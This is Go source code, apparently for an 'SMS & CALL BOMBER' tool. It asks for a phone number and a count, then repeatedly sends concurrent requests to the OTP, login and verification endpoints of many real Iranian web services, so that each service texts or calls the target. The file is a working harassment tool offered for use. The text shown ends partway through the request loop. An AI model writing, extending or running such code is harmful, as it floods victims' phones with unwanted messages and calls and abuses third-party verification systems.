/* 
   
   PROJECT BY ==> DachNima - DachAshkan
   AND ==> MegaTeam

*/

package main

import (
	"bytes"
	"encoding/json"
	"fmt"
	"net/http"
	"os"
	"os/exec"
	"runtime"
	"time"
)

func clearScreen() {
	cmd := exec.Command("clear")
	if runtime.GOOS == "windows" {
		cmd = exec.Command("cmd", "/c", "cls")
	}
	cmd.Stdout = os.Stdout
	cmd.Run()
}



func printGradientText(text string, startR, startG, startB, endR, endG, endB int) {
	runes := []rune(text)
	length := len(runes)
	
	if length == 0 {
		return
	}
	
	for i, char := range runes {
		ratio := float64(i) / float64(length-1)
		
		r := int(float64(startR) + ratio*float64(endR-startR))
		g := int(float64(startG) + ratio*float64(endG-startG))
		b := int(float64(startB) + ratio*float64(endB-startB))
		
		fmt.Printf("\033[38;2;%d;%d;%dm%c", r, g, b, char)
	}
	fmt.Print("\033[0m")
}

func sms(url string, header map[string]interface{}, ch chan<- int) {
	jsonData, err := json.Marshal(header)
	if err != nil {
		fmt.Println("\033[01;31m[-] Error ! ")
		ch <- http.StatusInternalServerError
		return
	}
	time.Sleep(3 * time.Second)
	resp, err := http.Post(url, "application/json", bytes.NewBuffer(jsonData))
	time.Sleep(3 * time.Second)
	if err != nil {
		fmt.Println("\033[01;31m[-] Error ! ")
		ch <- http.StatusInternalServerError
		return
	}
	ch <- resp.StatusCode
}

func main() {
	clearScreen()
	fmt.Println()
		fmt.Println()
	
	megateamLines := []string{
	"   ███╗   ███╗███████╗ ██████╗  █████╗ ██████╗  ██████╗ ███╗   ███╗██████╗ ",
	"   ████╗ ████║██╔════╝██╔════╝ ██╔══██╗██╔══██╗██╔═══██╗████╗ ████║██╔══██╗",
	"   ██╔████╔██║█████╗  ██║  ███╗███████║██████╔╝██║   ██║██╔████╔██║██████╔╝",
	"   ██║╚██╔╝██║██╔══╝  ██║   ██║██╔══██║██╔══██╗██║   ██║██║╚██╔╝██║██╔══██╗",
	"   ██║ ╚═╝ ██║███████╗╚██████╔╝██║  ██║██████╔╝╚██████╔╝██║ ╚═╝ ██║██████╔╝",
	"   ╚═╝     ╚═╝╚══════╝ ╚═════╝ ╚═╝  ╚═╝╚═════╝  ╚═════╝ ╚═╝     ╚═╝╚═════╝ ",
}
	
	for _, line := range megateamLines {
		printGradientText(line, 200, 230, 255, 200, 230, 255)  
		fmt.Println()
	}
	
	fmt.Println("\033[38;2;150;220;255m                SMS & CALL BOMBER - @DachAshkan| @NotMegaTeam\033[0m")
	fmt.Println()

	var phone string
	var repeatCount int

	fmt.Println("\033[38;2;150;220;255m   [\033[38;2;150;220;255m+\033[38;2;150;220;255m] \033[38;2;200;230;255mSMS Bomber - Number Web Service: => \033[38;2;100;170;255m177")
	fmt.Println("\033[38;2;150;220;255m   [\033[38;2;150;220;255m+\033[38;2;150;220;255m] \033[38;2;200;230;255mCall Bomber - Number Web Service: => \033[38;2;100;170;255m6")
	fmt.Println()

	fmt.Print("\033[38;2;150;220;255m    > \033[38;2;150;220;255m[\033[38;2;150;220;255m+\033[38;2;150;220;255m] \033[38;2;200;230;255mEnter Phone Number: \033[38;2;100;170;255m")
	fmt.Scan(&phone)

	fmt.Print("\033[38;2;150;220;255m    > \033[38;2;150;220;255m[\033[38;2;150;220;255m+\033[38;2;150;220;255m] \033[38;2;200;230;255mEnter Number SMS/Call: \033[38;2;100;170;255m")
	fmt.Scan(&repeatCount)

	ch := make(chan int)

	for i := 0; i < repeatCount; i++ {
		go sms("https://3tex.io/api/1/users/validation/mobile", map[string]interface{}{
			"receptorPhone": phone,
		}, ch)
		go sms("https://deniizshop.com/api/v1/sessions/login_request", map[string]interface{}{
			"mobile_phone": phone,
		}, ch)
		go sms("https://flightio.com/bff/Authentication/CheckUserKey", map[string]interface{}{
			"userKey": phone,
		}, ch)
		go sms("https://app.snapp.taxi/api/api-passenger-oauth/v2/otp", map[string]interface{}{
			"cellphone": phone,
		}, ch)
		go sms("https://bck.behtarino.com/api/v1/users/phone_verification/", map[string]interface{}{
			"phone": phone,
		}, ch)
		go sms("https://abantether.com/users/register/phone/send/", map[string]interface{}{
			"phoneNumber": phone,
		}, ch)
		s57 := fmt.Sprintf("phone=%s&call=yes", phone)
		go sms("https://novinbook.com/index.php?route=account/phone", map[string]interface{}{
			s57: phone,
		}, ch)
		go sms(fmt.Sprintf("https://www.azki.com/api/vehicleorder/api/customer/register/login-with-vocal-verification-code?phoneNumber=%s", phone), map[string]interface{}{
			"esfelurm": "esfelurm",
		}, ch)
		go sms("https://api.pooleno.ir/v1/auth/check-mobile", map[string]interface{}{
			"mobile": phone,
		}, ch)
		go sms("https://agent.wide-app.ir/auth/token", map[string]interface{}{
			"'grant_type': 'otp', 'client_id': '62b30c4af53e3b0cf100a4a0', 'phone'": phone,
		}, ch)
		sm := fmt.Sprintf("'credential': {'phoneNumber': %s, 'role': 'PASSENGER'}", phone)
		go sms("https://tap33.me/api/v2/user", map[string]interface{}{
			sm: phone,
		}, ch)
		go sms("https://web.emtiyaz.app/json/login", map[string]interface{}{
			"send=1&cellphone=": phone,
		}, ch)
		go sms("https://api.divar.ir/v5/auth/authenticate", map[string]interface{}{
			"phone": phone,
		}, ch)
		se := fmt.Sprintf("'api_version': '3', 'method': 'sendCode', 'data': {'phone_number': %s, 'send_type': 'SMS'}", phone)
		go sms("https://messengerg2c4.iranlms.ir/", map[string]interface{}{
			se: phone,
		}, ch)
		go sms("https://nx.classino.com/otp/v1/api/login", map[string]interface{}{
			"mobile": phone,
		}, ch)
		go sms("https://bama.ir/signin-checkforcellnumber", map[string]interface{}{
			"cellNumber=": phone,
		}, ch)
		go sms("https://snappfood.ir/mobile/v2/user/loginMobileWithNoPass?lat=35.774&long=51.418&optionalClient=WEBSITE&client=WEBSITE&deviceType=WEBSITE&appVersion=8.1.0&UDID=39c62f64-3d2d-4954-9033-816098559ae4&locale=fa", map[string]interface{}{
			"cellphone": phone,
		}, ch)
		go sms("https://ws.alibaba.ir/api/v3/account/mobile/otp", map[string]interface{}{
			"phoneNumber": phone,
		}, ch)
